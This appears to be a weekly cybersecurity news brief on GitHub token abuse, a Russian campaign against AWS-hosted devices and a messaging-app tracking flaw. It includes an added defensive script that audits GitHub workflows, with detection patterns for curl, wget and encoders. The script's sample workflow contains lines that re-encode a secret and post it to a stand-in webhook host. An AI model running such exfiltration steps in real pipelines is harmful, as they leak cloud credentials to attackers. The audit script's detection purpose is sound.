Brief #135: GitHub Enables Cross-Cloud Attacks, AI Agents Risk 76% of Orgs, Entry Salaries Drop 30%

Nikoloz Kokhreidze

8 min read

WhatsApp Silent Whisper flaw enables covert tracking with just phone numbers. Security incidents with $200K+ damages doubled to 13% as hybrid IT adoption hits 77%.

Happy Sunday!

Here is what went down this week:

  • GitHub token attacks are enabling attackers to move from compromised repositories directly into cloud environments, with most organizations storing cloud credentials in Action Secrets
  • 83% of enterprises use AI but nearly half have little visibility into how these systems access their data, creating significant governance blind spots
  • Entry-level cybersecurity jobs have become brutally competitive with salaries dropping 20-30% and Security+ certs no longer enough to land most positions

A quick note before we dive in.

Is Security Blocking Your Business?

Need a security leader on your team but don't need a full-time hire? Let's talk.

Industry News

GitHub PAT Attacks Enable Cross-Cloud Lateral Movement

  • Attackers are leveraging compromised GitHub Personal Access Tokens to discover Action Secrets names through API code search, then creating malicious workflows to execute code and steal cloud credentials from organizations.

  • Threat actors bypass GitHub's secret masking, which only redacts the literal secret string, by double-Base64-encoding stolen credentials before printing them to Action logs, or by exfiltrating them to external webhook endpoints, so the raw secret values can be harvested.

  • The attack enables lateral movement from GitHub repositories directly into victim cloud environments, with 73% of organizations storing CSP credentials in GitHub Action Secrets and 45% keeping plaintext cloud keys in private repositories.
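As an added defensive illustration (not code from the original brief or from GitHub), the following Python audit scans a GitHub Actions workflow for the two masking-bypass patterns described above: a `${{ secrets.* }}` reference piped through an encoder such as `base64`, or sent with `curl`/`wget` to a host outside GitHub. The workflow text, the trusted-host list and the sink patterns are constructed assumptions for the example; the heuristic is line-based, so a secret exported via `env:` and abused on a later line is not caught.

```python
import re
import urllib.parse
from dataclasses import dataclass

# A workflow-expression reference to an Action Secret, e.g. ${{ secrets.AWS_KEY }}
SECRET_REF = re.compile(r"\$\{\{\s*secrets\.([A-Za-z0-9_]+)\s*\}\}")
# Commands that transform a value: masking only redacts the literal secret
# string, so any re-encoded copy of it prints in the clear.
ENCODING_SINK = re.compile(r"\b(base64|xxd|od|rev|gzip|openssl\s+enc)\b")
# Network clients followed by a URL: a possible exfiltration to a webhook.
EXFIL_SINK = re.compile(r"\b(curl|wget|Invoke-WebRequest)\b.*?(https?://[^\s'\"]+)")
TRUSTED_HOSTS = ("github.com", "githubusercontent.com")  # assumption for the example

@dataclass
class Finding:
    line_no: int
    secret: str
    reason: str

def audit_workflow(text: str) -> list[Finding]:
    """Return one Finding per (line, secret) that reaches a risky sink."""
    findings = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        for name in SECRET_REF.findall(line):
            if ENCODING_SINK.search(line):
                findings.append(Finding(line_no, name, "secret piped through an encoder (defeats log masking)"))
            match = EXFIL_SINK.search(line)
            if match:
                host = urllib.parse.urlparse(match.group(2)).hostname or ""
                if not host.endswith(TRUSTED_HOSTS):
                    findings.append(Finding(line_no, name, f"secret sent to external endpoint {host}"))
    return findings

# Constructed sample workflow: one legitimate use of a secret, two abuses.
SAMPLE_WORKFLOW = """\
name: build
on: [push]
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: deploy
        run: aws s3 sync ./dist s3://example-bucket
        env:
          AWS_ACCESS_KEY_ID: ${{ secrets.AWS_ACCESS_KEY_ID }}
      - name: suspicious
        run: echo "${{ secrets.AWS_SECRET_ACCESS_KEY }}" | base64 | base64
      - name: also suspicious
        run: curl -X POST -d "${{ secrets.AWS_SECRET_ACCESS_KEY }}" https://hooks.example.invalid/abc
"""

if __name__ == "__main__":
    for f in audit_workflow(SAMPLE_WORKFLOW):
        print(f"line {f.line_no}: {f.secret}: {f.reason}")
```

Run it against every `.github/workflows/*.yml` in the organization, and treat any hit as a trigger to rotate the referenced cloud credential, since the brief notes most organizations keep CSP keys in exactly these secrets.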

Amazon Confirms 5-Year Russian Cyberattack Campaign Targeting AWS Infrastructure

  • Amazon threat intelligence has confirmed a Sandworm-linked Russian state-sponsored cyberattack campaign targeting AWS-hosted devices since 2021, focusing primarily on Western energy sector infrastructure in North America and Europe.

  • The attacks exploit misconfigured customer network edge devices rather than unpatched vulnerabilities, with threat actors taking advantage of exposed management interfaces and overly permissive identities to maintain persistent access.

  • Amazon's CSO separately disclosed blocking over 1,800 suspected North Korean IT workers since April 2024, who use stolen identities and laptop farms to secure remote positions and funnel earnings back to DPRK weapons programs.

Silent Whisper Vulnerability Allows Covert Tracking of WhatsApp and Signal Users

  • Researchers disclosed a tracking technique that exploits delivery acknowledgments in WhatsApp and Signal, allowing attackers to monitor devices silently using only a phone number without triggering visible messages or notifications.

  • The vulnerability causes significant battery drain during continuous probing, with test devices losing 14-18% battery per hour compared to normal 1% hourly consumption, while also consuming mobile data and disrupting bandwidth-heavy applications.

  • A publicly available proof-of-concept tool enables probing at 50ms intervals to reveal daily routines, sleep schedules, and travel patterns through response time analysis, with the vulnerability remaining exploitable as of December 2025.
